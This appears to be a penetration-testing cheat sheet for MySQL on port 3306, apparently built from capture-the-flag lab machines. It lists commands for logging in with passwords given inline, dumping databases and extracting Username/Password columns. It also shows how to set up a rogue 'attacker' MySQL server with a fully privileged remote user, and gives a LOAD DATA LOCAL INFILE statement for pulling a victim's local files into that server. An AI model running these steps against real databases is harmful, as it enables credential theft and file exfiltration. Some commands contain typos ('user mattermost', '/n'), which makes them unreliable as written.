3306 MYSQL

• Check version of Mysql database

• Exploitable version :-

  MariaDB 10.2 /MySQL

CLI commands ( connect , dump , etc...)

Direct execute command

mysql -e 'select * from accounts' -u root  previse -p

No whitespace in -p and password

mysql -u user -pPassword_1234 DataBase_Name

mysql -u mmuser -pCrack_The_MM_Admin_PW mattermost

mysqldump

mysqldump --databases Magic -utheseus -piamkingtheseus

mysqldump --user=theseus --password=iamkingtheseus --host=localhost Magic

CLI enumeration Commands (tables, databases , columns , etc...)

show databases;

+--------------------+
| Database           |
+--------------------+
| information_schema |
| mattermost         |
+--------------------+

use <database_name>;

user mattermost;

show tables;
+------------------------+
| Tables_in_mattermost   |
+------------------------+
| Audits                 |
| Bots                   |
...[snip]...
| UploadSessions         |
| UserAccessTokens       |
| UserGroups             |
| UserTermsOfService     |
| Users                  |
+------------------------+

DESCRIBE <TABLE_NAME>;

SHOW columns from <table_name>;

SELECT * FROM <TABLE_NAME>;

SELECT Username,Password FROM Users;

Creating Fake Mysql server (attaker-server) for SSRF or Remote Exploiting

Commands

sudo systemctl start mysql
sudo mysql -u root -p
CREATE USER 'vaibhav'@'%' IDENTIFIED BY 'password123';
GRANT ALL PRIVILEGES ON *.* TO 'vaibhav'@'%';
FLUSH PRIVILEGES;
create database <database_name>;
use <database_name>;
create table <table_name> (name varchar(255));
exit

Example

systemctl start mysql
mysql -u root -p
CREATE USER 'raaj'@'%' IDENTIFIED BY 'password';
GRANT ALL PRIVILEGES ON *.* TO 'raaj'@'%';
FLUSH PRIVILEGES;
create database admirer;
use admirer;
create table demo(name varchar(255));
exit

Loading / Redirecting Local sql server files to fake sql server (attacker-server)

load data local infile '../index.php'
into table <table_name>
fields terminated by "/n"